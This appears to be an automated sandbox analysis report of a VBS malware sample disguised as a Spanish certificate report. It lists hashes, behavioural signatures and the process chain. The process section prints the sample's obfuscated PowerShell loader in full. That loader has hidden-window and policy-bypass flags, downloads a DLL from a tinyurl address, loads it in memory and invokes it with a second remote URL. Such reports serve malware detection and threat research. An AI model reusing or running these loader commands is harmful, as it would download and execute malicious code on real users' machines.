Analysis
-
max time kernel
36s -
max time network
62s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
11/10/2022, 20:10
Static task
static1
Behavioral task
behavioral1
Sample
0025632547_Reportes_Certificados_20541874651198912310 De estar de acuerdo con la información propo.vbs
Resource
win7-20220812-en
General
-
Target
0025632547_Reportes_Certificados_20541874651198912310 De estar de acuerdo con la información propo.vbs
-
Size
201KB
-
MD5
7630029622a80a4a6563200a053ac39c
-
SHA1
54bbc37e0fd0dfe0d23874c295e59fa303aac7ff
-
SHA256
7310fb74edb1596430ef2e68fd3d339df540ae79e78d74895697ac81a1533204
-
SHA512
03b8fde8a8d3264ae78567be466dd630951913b0ccf60c7f5430b34061e9c521350d9ed75d8984487f2f74d582365e8de89867924ab609b57ae31e0ddeb84d37
-
SSDEEP
96:dyYRYFYDnYHFLvTfJZf4UbbNhtF/Zldy2ILS8414NEWUvWZ1+AN1qHk:d9ua6Ay/ATm45ZJ1qE
Malware Config
Extracted
https://tinyurl.com/2erph6cs
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 5 1676 powershell.exe 7 1676 powershell.exe 8 1676 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1176 powershell.exe 1676 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1176 powershell.exe Token: SeDebugPrivilege 1676 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1652 wrote to memory of 1176 1652 WScript.exe 27 PID 1652 wrote to memory of 1176 1652 WScript.exe 27 PID 1652 wrote to memory of 1176 1652 WScript.exe 27 PID 1176 wrote to memory of 1676 1176 powershell.exe 29 PID 1176 wrote to memory of 1676 1176 powershell.exe 29 PID 1176 wrote to memory of 1676 1176 powershell.exe 29
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0025632547_Reportes_Certificados_20541874651198912310 De estar de acuerdo con la información propo.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:1652 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwATIBQgFCCvAK8AFCCvABMgEyCvACcAOwBbAEIAeQB0AG⌚⌚⌚AWwBdAF0AIAAkAEQATABMACAAPQAgAFsAcwB5AHMAdABlAG0ALgBDAG8AbgB2AG⌚⌚⌚AcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQA⌚⌚⌚wB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAG⌚⌚⌚AdAAuAFcAZQBiAEMAbABpAG⌚⌚⌚AbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQA⌚⌚⌚wB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwB0AGkAbgB5AH⌚⌚⌚AcgBsAC4AYwBvAG0ALwAyAG⌚⌚⌚AcgBwAGgANgBjAHMAJwApACkAOwBbAHMAeQBzAHQAZQBtAC4AQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKAAkAEQATABMACkALgBHAG⌚⌚⌚AdAB⌚⌚⌚AHkAcABlACgAJwBOAHcAZwBvAHgATQAuAEsA⌚⌚⌚ABKAGEATgBqACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBQAF⌚⌚⌚AbABHAEsAQQAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAJwB0AHgAdAAuADIAWABaAC8AcwByAG⌚⌚⌚AZgBvAG0ALwB3AG⌚⌚⌚AbgAvADQANwAuADAANQAuADMAMQAyAC4AMQA5AC8ALwA6AHAAdAB0AGgAJwAgACwAIAAkAFIAbwBkAGEAQwBvAHAAeQAgACwAIAAnACQAJQAmAC8ANQA2ADcA⌚⌚⌚gAkAC⌚⌚⌚A⌚⌚⌚gB⌚⌚⌚AH⌚⌚⌚AeQAiACMAZAB0AHkAaAB0AHkAZgA1ADYANgA3ACcAIAApACkA';$OWjuxD = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $iUqm.replace('⌚⌚⌚','U') ) );$OWjuxD = $OWjuxD.replace('–——¯¯—¯––¯', 'C:\Users\Admin\AppData\Local\Temp\0025632547_Reportes_Certificados_20541874651198912310 De estar de acuerdo con la información propo.vbs');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1176 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$RodaCopy = 'C:\Users\Admin\AppData\Local\Temp\0025632547_Reportes_Certificados_20541874651198912310 De estar de acuerdo con la información propo.vbs';[Byte[]] $DLL = [system.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://tinyurl.com/2erph6cs'));[system.AppDomain]::CurrentDomain.Load($DLL).GetType('NwgoxM.KPJaNj').GetMethod('PUlGKA').Invoke($null, [object[]] ('txt.2XZ/srefom/wen/47.05.312.19//:ptth' , $RodaCopy , '$%&/567R$%RTuy"#dtyhtyf5667' ))"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1676
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD51fef7009d5d130fb62d87ea1b2434ddc
SHA13e8a7ad98f59a2b442f199791e91025eb5068791
SHA256cff066fb046b01c28610246655a1e04d662c7210462bb7b762c57480b02883d0
SHA512afd3727da06bb671c2561889329aeeaedd13e8f898dafbae2389a58d4c0514ba54cbd244eb540cdede041ba36f76680d3d6e11202616ab8867b672ab8af38bfd